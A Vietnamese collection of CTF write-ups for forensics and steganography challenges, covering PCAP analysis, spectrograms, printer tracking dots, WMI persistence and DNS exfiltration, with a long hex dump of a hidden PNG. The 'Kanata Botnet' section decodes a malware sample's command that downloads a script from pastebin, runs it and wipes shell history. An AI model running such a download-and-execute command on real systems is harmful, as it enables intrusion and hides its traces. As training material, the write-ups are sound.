💡 Some Digital Forensics and Steganoraphy Challenge in platform [Cookie Arena](https://battle.cookiearena.org/challenges/digital-forensics) # File Extension > *Description: Is real photo?* Mình mở HxD xem thử file thì 2 byte đầu tiên là `4D 5A` (`MZ`). Đây là 2 byte đầu tiên của header file thực thi 16-bit DOS MZ executable, với extension là `.exe`. Nên mình đổi extension và chạy file trong terminal.  --- # Streamer > *Description: PCAP stands for "Packet Capture." It refers to a file format and a common method for capturing and storing network traffic data. PCAP files are widely used in network analysis and troubleshooting to capture packets flowing through a network interface.* > *To extract files from a PCAP (Packet Capture) file through TCP streams, you can use various tools and scripts. One popular tool for this purpose is Wireshark, a network protocol analyzer that allows you to inspect and extract data from captured packets.* > *When you got a message `Flag{XXX}`, please submit the flag with format `CHH{XXX}`* Mình mở file bằng wireshark, sau đó vào File -> Export Objects -> HTTP và mình export all file, mình kiểm tra file evilcontent.zip thì thấy một file flag.txt, nhưng muốn mở thì cần phải có password. Nên mình kiểm tra các file .php và thấy password trong file login.php.  --- # ****Thumbnail**** - **File: thumb.db** *Description: In Windows, `thumbs.db` files are database files containing the small images displayed when you view a folder in Thumbnail view (as opposed to Tile, Icon, List, or Detail view). These files are automatically generated by Windows, and there is no harm in deleting them or excluding them from system backups.* Ban đầu mình mở bằng `Thumbcache viewer` mà không phải nên mình dùng Cyberchef extract luôn cho nhanh, có nhiều file ảnh jpg trong đó và có một tấm là flag.  --- # **Basic Image** - ********************File: bruteme.xlsx******************** *Describe: Photo metadata is data attached to image files that describes what the file is, when the image was taken, where it was taken, and how the file has been modified. Whenever a photo is taken digitally, the image is stored alongside its descriptive metadata.* `*ExifTool` is a free and open source software program which is used to read, write and update metadata of various types of files such as PDF, Audio, Video and images.* *When you got a message `Flag{XXX}`, please submit the flag with format `CHH{XXX}`* Theo mô tả của đề bài thì mình đổi brutme.xlsx thành brutem.zip và unzip nó. Kiểm tra nội dung của các file xml thì mình tìm thấy flag ở file sharedStrings.xml --- # Online Camera - **File: WebCam.png** *Description: You get a photo of a place taken from a online camera Use `https://holidaylivecam.com/camera/search?tag%5B%5D=schools_universities` to find the place* *Please check where the photo was taken* *FLAG Format is CHH{NAME_OF_PLACE}, for example CHH{Hong_Kong_Island}* Mình dùng Google image để search thử tấm ảnh. Ra trường đại học này, sau đó tìm địa chỉ của nó. --- # **Audacity** - **File: squitgame.wav** *Description:* *The Spectrogram View of an audio track provides a visual indication of how the energy in different frequency bands changes over time. The Spectrogram can show sudden onset of a sound, so it can often be easier to see clicks and other glitches or to line up beats in this view rather than in one of the waveform views.* *When you got a message `Flag{XXX}`, please submit the flag with format `CHH{XXX}`* Theo mô tả của đề bài thì mình mở file bằng tool `Audacity` và chỉnh là xem ở chế độ `Spectrogram`. Mình nghe thử thì thấy có một đoạn có những âm thanh hơi chói tai, nên mình đoán đây là kiểu giấu tin trong Spectrum. Mình vào Spectrogram Settings chỉnh thông số một xíu thì thấy flag.  --- # **From The Above** - **************************File: ufo.wav************************** *Every day multiple NOAA weather satellites pass above you. Each NOAA weather satellite broadcasts an Automatic Picture Transmission (APT) signal, which contains a live weather image of your area.* *We have an APT audio recording. Could you decode it? When you got a message `Flag{XXX}`, please submit the flag with format `CHH{XXX}`* Theo mô tả của đề bài, mình tìm hiểu về APT và NOAA, mình tìm thấy một tool là noaa-apt để decode APT audio recording. Dưới đây là giao diện của tool này.  Mình decode bản ghi âm đề cho và lưu tấm ảnh sau khi decode về.  --- # Kanata Botnet - *************************************File: payload.py************************************* *Description: Gần đây chúng tôi phát hiện một số dịch vụ bất thường chạy trên máy chủ Linux của chúng tôi. Chúng tôi nghi ngờ nó đang bị lạm dụng để phân phối các tải trọng độc hại. Sau khi rà soát máy chủ, chúng tôi tìm thấy một tệp có vẻ là nguồn gốc của sự cố. Hãy giúp chúng tôi phân tích để tìm ra địa chỉ CnC đang lưu trữ tải trọng* Trong file python này, có một đoạn đáng chú ý là cmd được encode base64. ```python def exploitmake(cmd): subprocess.call(cmd, shell=True) encoded = "Y2QgL3RtcDsgd2dldCBodHRwczovL3Bhc3RlYmluLmNvbS9yYXcvelltOHBWY3ogLU8gYSA+IC9kZXYvbnVsbCAyPiYxOyBjaG1vZCA3NzcgYTsgc2ggYSA+IC9kZXYvbnVsbCAyPiYxOyBybSAtcmYgYTsgaGlzdG9yeSAtYzsgY2xlYXI7" exploit = str(base64.b64decode(encoded)) ``` Mình decode thì: ```python exploit = cd /tmp; wget [https://pastebin.com/raw/zYm8pVcz](https://pastebin.com/raw/zYm8pVcz) -O a > /dev/null 2>&1; chmod 777 a; sh a > /dev/null 2>&1; rm -rf a; history -c; clear; ``` Truy cập link: [https://pastebin.com/raw/zYm8pVcz](https://pastebin.com/raw/zYm8pVcz) để lấy flag. # **Yellow Whistleblower** - ***File: huong-dan-ve-ga-cookiehanhoan.pdf*** *Description: A Machine Identification Code (MIC), also known as printer steganography, yellow dots, tracking dots, or secret dots, is a digital watermark that certain color laser printers and copiers leave on every printed page, allowing identification of the device which was used to print a document and giving clues to the originator.* *Developed by Xerox and Canon in the mid-1980s, its existence became public only in 2004. In 2018, scientists developed privacy software to anonymize prints to support whistleblowers publishing their work.* ***The flag format is CHH{Manufacturer-YYYYMMDD-HHMM}*** - *YYYY: Year* - *MM: Month* - *DD: Day* - *HH: Hour* - *MM: Minute* - *Manufacturer: Name of printer (eg, Epson, Dell, HP,..)* A Machine Identification Code (MIC) hay còn được biết đến là yellows dots (còn nhiều cái tên khác nữa), hiểu nôm na là trên một paper được thêm vào những dấu chấm bí mật khó phát hiện bằng mắt thường, nhằm nhận dạng máy in được dùng để in paper đó. Sau khi tải file .pdf thì mình dùng `pdftoppm` để convert sang file ảnh. ```bash $ pdftoppm huong-dan-ve-ga-cookiehanhoan.pdf pic -png ``` Sau khi tìm hiểu thì có một trang github giúp phân tích yellow dots là [deda](https://github.com/dfd-tud/deda) . Trước tiên mình tải theo hướng dẫn trước. ```bash $ pip3 install --user deda $ pip3 install --user wand ``` Và dùng thử bằng câu lệnh `deda_parse_print pic-1.png` nhưng bị lỗi ```bash raise ImportError('MagickWand shared library not found.\n' ImportError: MagickWand shared library not found. You probably had not installed ImageMagick library. Try to install: https://docs.wand-py.org/en/latest/guide/install.htm ``` Sau đó mình phải tải thêm một thư viện ImageMagick. `sudo apt install libmagickwand-dev` Thử lại câu lệnh `deda_parse_print` thì mình có được thông tin của máy như sau:  --- # Event Subscription - ***Folder: Repository*** *Description: Đội CSIRT của chúng tôi được yêu cầu xử lý sự cố trên một máy chủ mà chúng tôi đã xử lý xong cách đây vài ngày. Vì vậy chúng tôi tin rằng vẫn còn một cơ chế persistence nào đó của kẻ tấn công mà chúng tôi đã bỏ sót* Đây là lần đầu tiên mình thấy các file có extension như vậy, nên khá là lạ lẫm.  Lúc đầu mình search không ra, do keyword sai + mình chỉ search extension xem nó là gì thui. Sau đó được gợi ý thì mình search ra được Repository này là `WMI Repository`. Chi tiết về WMI thì xem tại [trang](https://netsecninja.github.io/dfir-notes/wmi-forensics/) này. Ngoài ra thì mình cũng tham khảo [WU](https://www.hackthebox.com/blog/perseverance-biz-ctf-2022-forensics-writeup) của challenge khá tương tự. Bước đầu tiên mình đọc file [OBJECTS.DATA](http://OBJECTS.DATA) bằng cách git clone repo [WMI_Forensics](https://github.com/davidpany/WMI_Forensics) và chạy file [`PyWMIPersistenceFinder.](https://github.com/davidpany/WMI_Forensics/blob/master/PyWMIPersistenceFinder.py)py` ```bash $ python2 [PyWMIPersistenceFinder.](https://github.com/davidpany/WMI_Forensics/blob/master/PyWMIPersistenceFinder.py)py OBJECTS.DATA ``` Cuối cùng thì mình ra được danh sách binding (? or binds?)  Chỗ arguments của consumer đầu tiên có vẻ được encode rồi, mình decode base64 thử thì ra flag luôn. --- # Ecoji - **Folder: Packages** *Describe: Annie nghi ngờ rằng chồng mình có nhân tình vì anh ta thường xuyên sử dụng emoji (biểu tượng cảm xúc) của Windows để nhắn tin như một dạng mã hóa tin nhắn. Vì vậy nhân lúc chồng đi vắng, cô ấy quyết định forensics xem anh ta đã nhắn những gì* Ban đầu mình để ý file `$I30` trước, đây là file `NTFS $I30 Index Attributes`, nói đại khái thì file này sẽ cung cấp cho chúng ta sự có mặt của một file trong thư mục và những thông tin liên quan khác (tên file, thời gian khởi tạo, size… xem chi tiết tại [đây](https://www.sans.org/blog/ntfs-i30-index-attributes-evidence-of-deleted-and-overwritten-files/)). Mình thử parse và xem thử vài file $I30 thì không có thông tin gì thêm nên mình đổi hướng khác. Vì bài này liên quan tới Ecoji nên mình lên mạng search và thấy một [blog](https://www.sans.org/blog/ntfs-i30-index-attributes-evidence-of-deleted-and-overwritten-files/) về location của ecoji trong file system. Path là `Packages/MicrosoftWindows.Client.CBS_cw5n1h2txyewy/Settings/setting.dat`  `Replace input with output` thì ta sẽ thấy được các ecoji trong file này. Và trước mỗi hình đều có một con số, mình đoán là số lần sử dụng, nên mình chỉ lấy các ecoji có số 1 phía trước thôi.  🍨🧬🤛🍔🚃👩🐰🖖🚂💅🛁📰🍌️🧙‍♂️ Sau đó mình decrypt 7749 lần với đủ loại thứ tự thì không ra gì hết, nên mình thử encrypt cái format thử. (repo dùng để decrypt và encrypt ecoji tại [đây](https://github.com/keith-turner/ecoji))   Qua hai ảnh trên thì mình đoán là ecoji phải đảo ngược lại. 🧙‍♂️🍌📰🛁💅🚂🖖🐰👩🚃🍔🤛🧬🍨  --- # Dismantling - **File: dismantling.pcap** *Description: Be careful with Alternative Protocol* Sau khi mở file lên thì mình thấy có khá nhiều loại protocol khác nhau, kéo xem hết một lượt thì mình lấy protocol DNS có những query rất lạ.  Những tên miền được query không tồn tại, và phần trước .cookiearena đều là những chuỗi hex. Đầu tiên thì mình export data bằng tshark trước. ```bash tshark -r Dismantling.pcap -Y "dns and ip.src == 192.168.25.135" -T fields -e dns.qry.name > output ``` File sẽ trong như thế này:  Nên tiếp theo đó mình viết một script bằng python để lấy phần hex ra. ```python s="" with open(r"Dismantiling\output", "r") as file: for line in file: line= line.strip() # loại bỏ khoảng trắng và xuống dòng parts=line.split(".cookiearena.org") s+=parts[0] with open(r"Dismantiling\hexfile.txt", "w") as file: file.write(s) ``` ```bash cat hexfile.txt | xxd -r -p > out file out ```  Đây là file excel nên là mình đổi tên file thành out.xlsx và mở file.  --- # Can you see me? - ********************File: s3cr3t.png******************** *Description: Doing with image files should be the first step for anyone who learning cybersecurity.* Đầu tiên mình exiftool xem thử thông tin ảnh này.  Phần comment có gì đó lạ, và ảnh png này cũng bị corrupt luôn. Mình check xem ảnh này bị gì nhé `pngcheck -v s3cr3t.png`  Mình tìm xem chunk `00 4e 00 47` nằm ở đâu.  Có thể thấy là đang được giấu một ảnh png khác, mình sẽ extract phần này ra, có những cột 00 ở giữa nên mình sẽ bỏ phần này luôn. ```python data = "89 00 50 00 4E 00 47 00 0D 00 0A 00 1A 00 0A 00 00 00 00 00 00 00 0D 00 49 00 48 00 44 00 52 00 00 00 00 00 00 00 FA 00 00 00 00 00 00 00 FA 00 08 00 02 00 00 00 00 00 00 00 07 00 8E 00 CD 00 6A 00 00 00 00 00 0D 00 C3 00 49 00 44 00 41 00 54 00 78 00 9C 00 ED 00 DD 00 4F 00 A8 00 AE 00 55 00 15 00 C7 00 F1 00 AF 00 47 00 F3 00 6F 00 54 00 84 00 8A 00 98 00 88 00 23 00 9D 00 35 00 12 00 A9 00 91 00 14 00 06 00 41 00 16 00 37 00 A8 00 28 00 6A 00 90 00 29 00 35 00 C8 00 82 00 24 00 4D 00 10 00 4B 00 03 00 9D 00 4A 00 D0 00 A4 00 E8 00 0F 00 84 00 0D 00 9A 00 39 00 0A 00 42 00 48 00 A2 00 A0 00 46 00 41 00 D1 00 20 00 25 00 C4 00 20 00 E9 00 5E 00 2A 00 EC 00 9F 00 50 00 A0 00 FC 00 1A 00 2C 00 0F 00 67 00 79 00 F7 00 79 00 9E 00 9E 00 7B 00 DF 00 F7 00 5C 00 9F 00 67 00 AD 00 DF 00 CB 00 82 00 F7 00 7D 00 9F 00 3F 00 FB 00 D9 00 67 00 EF 00 75 00 3F 00 AC 00 7D 00 D8 00 F7 00 5E 00 24 00 A4 00 53 00 12 00 D2 00 07 00 24 00 A4 00 8B 00 25 00 A4 00 4B 00 24 00 A4 00 2B 00 25 00 0E 00 E3 00 8A 00 F4 00 39 00 C7 00 9B 00 25 00 A4 00 AF 00 4A 00 48 00 BF 00 94 00 90 00 3E 00 26 00 21 00 3D 00 23 00 21 00 FD 00 57 00 42 00 BA 00 45 00 42 00 7A 00 5A 00 42 00 BA 00 69 00 A2 00 9D 00 AB 00 27 00 8E 00 5F 00 9E 00 3E 00 DF 00 90 00 3E 00 7F 00 56 00 42 00 BA 00 57 00 42 00 BA 00 4B 00 42 00 FA 00 9C 00 84 00 F4 00 4E 00 09 00 E9 00 CB 00 12 00 D2 00 83 00 E9 00 F3 00 47 00 25 00 A4 00 8F 00 0C 00 3F 00 4B 00 FC 00 BC 00 1F 00 97 00 90 00 EE 00 90 00 90 00 1E 00 91 00 90 00 EE 00 91 00 90 00 1E 00 9F 00 38 00 7E 00 7F 00 6A 00 FF 00 AA 00 D4 00 DA 00 45 00 69 00 F4 00 4E 00 A7 00 F6 00 73 00 CC 00 9F 00 7D 00 4E 00 42 00 BA 00 4F 00 42 00 BA 00 46 00 42 00 7A 00 40 00 42 00 BA 00 55 00 42 00 FA 00 9E 00 84 00 F4 00 0F 00 09 00 E9 00 61 00 09 00 E9 00 FD 00 12 00 D2 00 F3 00 12 00 D2 00 7B 00 25 00 A4 00 EB 00 25 00 A4 00 7F 00 49 00 48 00 77 00 4B 00 48 00 9F 00 94 00 90 00 7E 00 25 00 21 00 DD 00 9E 00 7A 00 FE 00 13 00 09 00 E9 00 7D 00 12 00 D2 00 87 00 25 00 A4 00 2F 00 4A 00 48 00 0F 00 49 00 48 00 2F 00 49 00 48 00 3F 00 94 00 90 00 5E 00 96 00 90 00 9E 00 95 00 90 00 FE 00 22 00 21 00 3D 00 26 00 21 00 FD 00 4E 00 42 00 7A 00 54 00 42 00 BA 00 76 00 C8 00 A5 00 CB 00 D2 00 0C 00 EE 00 2B 00 1F 00 72 00 FB 00 31 00 DA 00 07 00 12 00 D2 00 8D 00 69 00 3C 00 27 00 F3 00 36 00 37 00 74 00 21 00 13 00 F7 00 BA 00 89 00 6B 00 72 00 5C 00 34 00 71 00 FC 00 C9 00 34 00 C4 00 53 00 B1 00 CB 00 1F 00 86 00 37 00 A5 00 76 00 E6 00 FF 00 30 00 9C 00 5C 00 D2 00 E7 00 49 00 8D 00 FE 00 5C 00 BA 00 78 00 AC 00 F2 00 E7 00 0F 00 4D 00 5C 00 7F 00 DF 00 82 00 F1 00 CF 00 7D 00 28 00 82 00 20 00 B3 00 13 00 6F 00 05 00 9B 00 2A 00 98 00 A2 00 14 00 82 00 F1 00 66 00 05 00 AD 00 60 00 8B 00 52 00 30 00 2E 00 B2 00 82 00 56 00 30 00 47 00 D9 00 52 00 70 00 C9 00 60 00 59 00 C1 00 76 00 0A 00 4A 00 94 00 44 00 70 00 79 00 42 00 E4 00 07 00 58 00 C1 00 88 00 B2 00 0A 00 2E 00 18 00 AB 00 4D 00 22 00 38 00 D5 00 09 00 2B 00 18 00 D1 00 54 00 C1 00 C5 00 F9 00 90 00 DB 00 DF 00 00 00 82 00 F1 00 C5 00 0A 00 5A 00 C1 00 16 00 A5 00 E0 00 01 00 00 00 67 00 00 00 B8 00 04 00 80 00 D3 00 00 00 5C 00 CC 00 D9 00 AF 00 8B 00 27 00 CE 00 7E 00 0A 00 80 00 4F 00 00 00 70 00 1F 00 00 00 D7 00 00 00 F0 00 00 00 00 00 B7 00 02 00 F0 00 2E 00 00 00 1E 00 03 00 E0 00 06 00 00 00 FE 00 08 00 C0 00 53 00 00 00 FC 00 1A 00 80 00 1F 00 00 00 F0 00 35 00 00 00 DE 00 02 00 C0 00 65 00 00 00 FC 00 1C 00 80 00 DB 00 01 00 B8 00 1F 00 80 00 BB 00 00 00 B8 00 08 00 80 00 DF 00 00 00 70 00 25 00 00 00 97 00 02 00 F0 00 15 00 00 00 BE 00 0D 00 C0 00 CB 00 00 00 FC 00 1E 00 80 00 3F 00 03 00 F0 00 DD 00 74 00 D7 00 A3 00 00 00 5C 00 0B 00 C0 00 9D 00 00 00 DC 00 0D 00 1C 00 8E 00 C3 00 E5 00 00 00 3C 00 03 00 C0 00 8F 00 00 00 F8 00 03 00 00 00 3F 00 06 00 E0 00 7A 00 8E 00 7F 00 5D 00 0D 00 80 00 D2 00 91 00 F8 00 7C 00 0A 00 80 00 57 00 53 00 CF 00 63 00 E4 00 6F 00 04 00 E0 00 1B 00 E9 00 A7 00 88 00 D7 00 15 00 43 00 CB 00 4F 00 01 00 F0 00 33 00 00 00 1E 00 02 00 0E 00 47 00 E6 00 CE 00 D4 00 CF 00 BF 00 03 00 70 00 0B 00 00 00 4F 00 03 00 70 00 13 00 00 00 FF 00 06 00 E0 00 EB 00 00 00 BC 00 1B 00 80 00 9F 00 02 00 F0 00 1E 00 E0 00 70 00 9C 00 9F 00 05 00 E0 00 83 00 00 00 BC 00 00 00 C0 00 75 00 43 00 1F 00 FE 00 3A 00 1C 00 89 00 9F 00 E5 00 3F 00 E9 00 C8 00 9F 00 00 00 78 00 12 00 80 00 77 00 00 00 F0 00 4D 00 00 00 BE 00 0F 00 C0 00 B7 00 00 00 F8 00 2D 00 00 00 FF 00 4C 00 7D 00 FB 00 1B 00 00 00 6F 00 07 00 E0 00 39 00 00 00 3E 00 0F 00 C0 00 83 00 00 00 7C 00 09 00 38 00 1C 00 BD 00 B7 00 01 00 87 00 B9 00 F4 00 1D 00 00 00 1E 00 06 00 0E 00 47 00 FE 00 17 00 C0 00 61 00 8E 00 BD 00 94 00 EE 00 FA 00 02 00 00 00 57 00 8D 00 26 00 59 00 41 00 2B 00 B8 00 AF 00 7C 00 58 00 5D 00 29 00 18 00 DD 00 72 00 2D 00 78 00 AE 00 FD 00 F4 00 82 00 38 00 C7 00 66 00 10 00 CC 00 03 00 61 00 05 00 AD 00 60 00 F1 00 05 00 71 00 BC 00 59 00 41 00 2B 00 38 00 F6 00 A1 00 20 00 82 00 0C 00 13 00 6F 00 05 00 AD 00 60 00 D9 00 52 00 30 00 0E 00 59 00 C1 00 1C 00 56 00 B0 00 6C 00 29 00 18 00 37 00 58 00 41 00 2B 00 D8 00 A2 00 14 00 9C 00 1A 00 2C 00 2B 00 D8 00 5A 00 41 00 89 00 92 00 08 00 CE 00 27 00 44 00 7E 00 80 00 15 00 8C 00 68 00 A1 00 E0 00 C4 00 58 00 6D 00 1E 00 C1 00 DC 00 90 00 15 00 8C 00 B0 00 82 00 F3 00 F9 00 90 00 DB 00 DF 00 18 00 82 00 C7 00 5E 00 77 00 56 00 EA 00 8C 00 61 00 05 00 E7 00 C7 00 6A 00 F3 00 0A 00 A6 00 28 00 85 00 60 00 EC 00 DC 00 F0 00 3E 00 19 00 EF 00 93 00 79 00 01 00 A8 00 B9 00 4F 00 06 00 0E 00 67 00 E4 00 D5 00 25 00 CE 00 59 00 C1 00 76 00 0A 00 EE 00 90 00 0F 00 AB 00 2E 00 05 00 A3 00 8B 00 AE 00 05 00 97 00 F4 00 D3 00 0B 00 E2 00 1C 00 9B 00 44 00 30 00 4E 00 AC 00 2D 00 99 00 AC 00 A0 00 17 00 C4 00 B9 00 FD 00 BD 00 21 00 18 00 87 00 AC 00 A0 00 15 00 6C 00 51 00 0A 00 8E 00 3F 00 8C 00 15 00 B4 00 82 00 65 00 4B 00 C1 00 38 00 6D 00 05 00 AD 00 60 00 8B 00 52 00 30 00 6E 00 B6 00 82 00 56 00 B0 00 45 00 29 00 38 00 35 00 70 00 56 00 B0 00 B5 00 82 00 12 00 25 00 11 00 1C 00 4F 00 E4 00 07 00 58 00 C1 00 88 00 76 00 0A 00 4E 00 7C 00 DE 00 3C 00 82 00 53 00 9D 00 B3 00 82 00 AD 00 15 00 1C 00 22 00 B7 00 BF 00 61 00 04 00 C7 00 1B 00 AC 00 A0 00 15 00 2C 00 5B 00 0A 00 1E 00 0C 00 3B 00 22 00 BC 00 4F 00 C6 00 FB 00 64 00 6A 00 ED 00 93 00 39 00 BA 00 F2 00 C5 00 FC 00 A7 00 CA 00 0A 00 5A 00 C1 00 E2 00 A5 00 60 00 74 00 D7 00 B5 00 A0 00 17 00 C4 00 2D 00 4A 00 C1 00 B8 00 68 00 0D 00 C9 00 64 00 05 00 57 00 A4 00 A0 00 44 00 49 00 04 00 D9 00 53 00 47 00 AD 00 60 00 8E 00 CD 00 2B 00 28 00 51 00 12 00 C1 00 25 00 13 00 6F 00 05 00 DB 00 29 00 B8 00 A7 00 7E 00 AE 00 0E 00 41 00 D2 00 17 00 2B 00 38 00 46 00 EE 00 43 00 23 00 05 00 17 00 CC 00 FB 00 26 00 11 00 8C 00 86 00 AC 00 20 00 C3 00 64 00 E7 00 68 00 A7 00 60 00 FA 00 5C 00 0A 00 C1 00 7C 00 C2 00 0A 00 5A 00 C1 00 E2 00 A5 00 20 00 C3 00 03 00 AC 00 60 00 44 00 6B 00 05 00 D3 00 E7 00 52 00 08 00 E6 00 13 00 56 00 D0 00 0A 00 E6 00 C8 00 ED 00 17 00 41 00 30 00 A7 00 CE 00 18 00 56 00 70 00 8C 00 16 00 0A 00 A6 00 28 00 85 00 60 00 EC 00 E8 00 F0 00 3E 00 19 00 EF 00 93 00 A9 00 BB 00 4F 00 06 00 8E 00 B2 00 DA 00 0A 00 5A 00 C1 00 89 00 19 00 2F 00 58 00 0A 00 46 00 D7 00 5D 00 0B 00 E6 00 F0 00 82 00 38 00 47 00 29 00 04 00 C7 00 9B 00 AD 00 A0 00 15 00 2C 00 BB 00 20 00 66 00 87 00 8E 00 5A 00 C1 00 1C 00 A5 00 14 00 1C 00 A2 00 08 00 82 00 4C 00 4C 00 BC 00 15 00 6C 00 AD 00 E0 00 0E 00 FD 00 5C 00 35 00 82 00 71 00 9B 00 15 00 9C 00 EA 00 43 00 53 00 05 00 27 00 E6 00 7D 00 F3 00 08 00 46 00 A3 00 56 00 70 00 8C 00 D6 00 0A 00 4A 00 94 00 44 00 70 00 EA 00 06 00 2B 00 D8 00 5A 00 41 00 89 00 92 00 08 00 E6 00 E1 00 B6 00 82 00 56 00 30 00 A2 00 6C 00 29 00 98 00 BF 00 58 00 41 00 2B 00 98 00 DB 00 2F 00 88 00 E0 00 78 00 C2 00 0A 00 4E 00 0E 00 D6 00 F0 00 B9 00 AC 00 82 00 E9 00 73 00 29 00 04 00 0F 00 5E 00 B7 00 A3 00 00 00 BC 00 4F 00 E6 00 F5 00 2F 00 EF 00 93 00 D9 00 FE 00 3E 00 19 00 80 00 57 00 5E 00 3B 00 6B 00 05 00 AD 00 E0 00 A8 00 E0 00 C4 00 D9 00 CD 00 97 00 82 00 A4 00 64 00 72 00 2D 00 18 00 E1 00 05 00 71 00 D9 00 52 00 30 00 DE 00 AC 00 A0 00 15 00 6C 00 B1 00 20 00 3E 00 B6 00 95 00 99 00 8E 00 5A 00 C1 00 1C 00 65 00 15 00 94 00 28 00 89 00 20 00 69 00 E2 00 AD 00 A0 00 15 00 2C 00 5E 00 0A 00 E6 00 86 00 AC 00 A0 00 15 00 2C 00 5E 00 0A 00 C6 00 03 00 AC 00 60 00 84 00 15 00 2C 00 5E 00 0A 00 E6 00 1B 00 AC 00 A0 00 15 00 2C 00 5E 00 0A 00 C6 00 09 00 2B 00 68 00 05 00 5B 00 94 00 82 00 FB 00 9A 00 78 00 2B 00 58 00 4A 00 41 00 89 00 92 00 08 00 C6 00 9B 00 15 00 9C 00 1F 00 AC 00 76 00 0A 00 EE 00 69 00 DE 00 57 00 87 00 60 00 EC 00 F4 00 F0 00 3E 00 99 00 FC 00 F2 00 3E 00 99 00 5A 00 FB 00 64 00 F2 00 59 00 2B 00 68 00 05 00 67 00 CF 00 96 00 2A 00 05 00 F3 00 14 00 BA 00 16 00 9C 00 0F 00 2F 00 88 00 37 00 8F 00 60 00 7C 00 B1 00 82 00 56 00 30 00 27 00 53 00 D9 00 05 00 F1 00 92 00 8E 00 5A 00 C1 00 1C 00 2D 00 14 00 94 00 28 00 89 00 20 00 17 00 3C 00 21 00 AC 00 E0 00 7C 00 42 00 E4 00 F6 00 5D 00 0A 00 46 00 EC 00 0D 00 C1 00 78 00 B3 00 82 00 56 00 30 00 CF 00 7B 00 D9 00 52 00 30 00 1E 00 66 00 05 00 AD 00 60 00 8B 00 52 00 F0 00 FF 00 8E 00 3E 00 56 00 B0 00 A1 00 82 00 12 00 25 00 11 00 8C 00 8B 00 D6 00 96 00 B8 00 56 00 D0 00 A5 00 E0 00 89 00 20 00 C8 00 0E 00 13 00 6F 00 05 00 CB 00 2A 00 28 00 B1 00 BE 00 C4 00 DD 00 03 00 82 00 F3 00 37 00 5B 00 C1 00 88 00 76 00 0A 00 EE 00 30 00 EF 00 AB 00 46 00 30 00 76 00 7D 00 78 00 9F 00 8C 00 F7 00 C9 00 D4 00 DD 00 27 00 73 00 F4 00 BA 00 D9 00 0A 00 5A 00 C1 00 46 00 A5 00 20 00 7B 00 4A 00 88 00 FC 00 80 00 46 00 B5 00 E0 00 EC 00 BD 00 2E 00 05 00 23 00 56 00 84 00 60 00 9C 00 B0 00 82 00 56 00 B0 00 C5 00 82 00 F8 00 D8 00 A3 00 58 00 C1 00 D7 00 47 00 3B 00 05 00 25 00 4A 00 22 00 C8 00 05 00 49 00 08 00 2B 00 38 00 9F 00 10 00 B9 00 FD 00 55 00 28 00 38 00 71 00 7C 00 F3 00 08 00 C6 00 A1 00 47 00 24 00 AC 00 E0 00 61 00 AC 00 21 00 99 00 5C 00 0A 00 9E 00 08 00 82 00 F1 00 60 00 2B 00 68 00 05 00 5B 00 94 00 82 00 53 00 8D 00 E6 00 4E 00 58 00 C1 00 3C 00 F1 00 2D 00 14 00 94 00 28 00 89 00 20 00 C3 00 64 00 E7 00 B0 00 82 00 4D 00 15 00 9C 00 88 00 DC 00 87 00 4D 00 22 00 C8 00 39 00 4E 00 BC 00 15 00 6C 00 A1 00 E0 00 30 00 D7 00 39 00 36 00 8C 00 E0 00 78 00 91 00 15 00 8C 00 68 00 AD 00 E0 00 39 00 CE 00 FB 00 66 00 10 00 8C 00 1D 00 20 00 DE 00 27 00 43 00 FA 00 7C 00 0A 00 F0 00 3E 00 99 00 3A 00 FB 00 64 00 00 00 9E 00 07 00 E0 00 36 00 AC 00 A0 00 15 00 1C 00 15 00 94 00 28 00 59 00 0A 00 B2 00 43 00 42 00 E4 00 07 00 34 00 AD 00 05 00 87 00 70 00 29 00 18 00 B1 00 52 00 04 00 E3 00 22 00 2B 00 B8 00 3C 00 21 00 5A 00 28 00 B8 00 43 00 3E 00 E4 00 F6 00 57 00 87 00 60 00 3E 00 61 00 05 00 73 00 B4 00 56 00 50 00 A2 00 24 00 82 00 9C 00 58 00 42 00 58 00 C1 00 F9 00 84 00 C8 00 ED 00 AF 00 4E 00 C1 00 14 00 A5 00 10 00 8C 00 D3 00 56 00 70 00 0D 00 C9 00 B4 00 22 00 05 00 4F 00 2C 00 1F 00 DE 00 60 00 04 00 A3 00 13 00 56 00 D0 00 0A 00 B6 00 28 00 05 00 A7 00 3A 00 61 00 05 00 F3 00 C4 00 B7 00 53 00 50 00 A2 00 24 00 82 00 63 00 43 00 56 00 D0 00 0A 00 4E 00 F5 00 61 00 F3 00 08 00 B2 00 60 00 E2 00 AD 00 60 00 3B 00 05 00 87 00 28 00 82 00 60 00 BC 00 59 00 C1 00 08 00 2B 00 58 00 BC 00 14 00 8C 00 DD 00 20 00 DE 00 27 00 73 00 0A 00 F0 00 3E 00 99 00 9A 00 FB 00 64 00 00 00 9E 00 78 00 ED 00 E7 00 B2 00 82 00 56 00 70 00 54 00 50 00 A2 00 64 00 29 00 78 00 EC 00 AC 00 CF 00 24 00 44 00 7E 00 80 00 6B 00 C1 00 08 00 97 00 82 00 11 00 1B 00 40 00 30 00 6E 00 B8 00 69 00 A2 00 21 00 2B 00 18 00 D1 00 4E 00 C1 00 73 00 CC 00 87 00 DC 00 FE 00 AA 00 11 00 CC 00 5F 00 AC 00 A0 00 15 00 2C 00 5E 00 0A 00 1E 00 A4 00 02 00 FF 00 0C 00 70 00 B8 00 10 00 3C 00 3D 00 94 00 FF 00 A4 00 23 00 E3 00 59 00 FF 00 47 00 C4 00 F9 00 E5 00 05 00 F1 00 5A 00 17 00 C4 00 56 00 D0 00 0A 00 8E 00 0A 00 EE 00 35 00 1F 00 56 00 54 00 0A 00 46 00 87 00 5C 00 0B 00 7A 00 41 00 DC 00 A2 00 14 00 24 00 75 00 C2 00 0A 00 E6 00 89 00 6F 00 AD 00 A0 00 44 00 49 00 04 00 E3 00 CD 00 0A 00 5A 00 C1 00 A9 00 3E 00 94 00 42 00 90 00 89 00 89 00 B7 00 82 00 AD 00 15 00 94 00 28 00 89 00 60 00 7C 00 B1 00 82 00 63 00 B4 00 56 00 70 00 62 00 DE 00 37 00 8F 00 E0 00 41 00 FA 00 95 00 8D 00 7F 00 2D 00 E8 00 5F 00 0B 00 56 00 DC 00 27 00 03 00 F0 00 19 00 00 00 DE 00 6A 00 05 00 AD 00 60 00 A3 00 52 00 70 00 49 00 42 00 E4 00 07 00 B8 00 16 00 8C 00 F0 00 82 00 38 00 62 00 63 00 08 00 8E 00 0D 00 59 00 C1 00 88 00 D6 00 0A 00 2E 00 C8 00 87 00 DC 00 FE 00 66 00 10 00 3C 00 F6 00 8A 00 B3 00 C2 00 0A 00 B6 00 53 00 70 00 88 00 22 00 08 00 C6 00 E2 00 CC 00 FB 00 64 00 BC 00 20 00 EE 00 B1 00 20 00 B6 00 82 00 